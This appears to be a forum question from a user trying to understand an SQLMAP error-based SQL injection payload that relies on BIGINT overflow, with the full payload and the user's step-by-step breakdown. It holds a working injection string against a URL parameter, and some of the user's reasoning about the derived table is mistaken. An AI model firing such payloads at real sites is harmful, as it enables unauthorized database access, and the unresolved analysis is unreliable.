I am trying Error Based SQL injection technique using SQLMAP. The technique as identified by SQLMAP is
error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
It will be great if someone can help give some clarity on the payload SQLMAP is using.
Payload: web/test?abc='' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716b626b71,(SELECT (ELT(9092=9092,1))),0x71626b7071,0x78))s), 8446744073709551610, 8446744073709551610)))-- pprs
More specifically, what is happening in this SQL query
(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716b626b71,(SELECT (ELT(9092=9092,1))),0x71626b7071,0x78))s), 8446744073709551610, 8446744073709551610)))
Update1:
The formatted query looks like this:
SELECT
2*(IF((
SELECT
*
FROM
(
SELECT
CONCAT(0x716b626b71,
(
SELECT
(ELT(9092 = 9092, 1))
)
, 0x71626b7071, 0x78)
)
s), 8446744073709551610, 8446744073709551610))
SELECT (ELT(9092 = 9092, 1)) : Query output is 1 as 9092=9092 results to true(i.e 1) and ELT function returns the 1st argument i.e is 1
So the next sub-query is :
SELECT CONCAT(0x716b626b71, 1, 0x71626b7071, 0x78) : Query Output results to concatenated string "qkbkq1qbkpqx" (after converting the hex to string)
However, the resultant sub-query SELECT * FROM qkbkq1qbkpqx gives an error saying Every derived table must have its own alias
Update2:
I missed the alias in the query as @tcadidot0 mentioned. So now the resultant sub-query is :
SELECT * FROM qkbkq1qbkpqx s
And the final query is:
SELECT 2*(IF((SELECT * FROM qkbkq1qbkpqx s), 8446744073709551610, 8446744073709551610))
If the table "qkbkq1qbkpqx" exists, then it returns 8446744073709551610 else it returns 8446744073709551610, however 2 times the result leads to this error : BIGINT value is out of range in '(2 * if((1 > 0),8446744073709551610,8446744073709551610)), assuming 1>0 is the condition instead of the select statement.
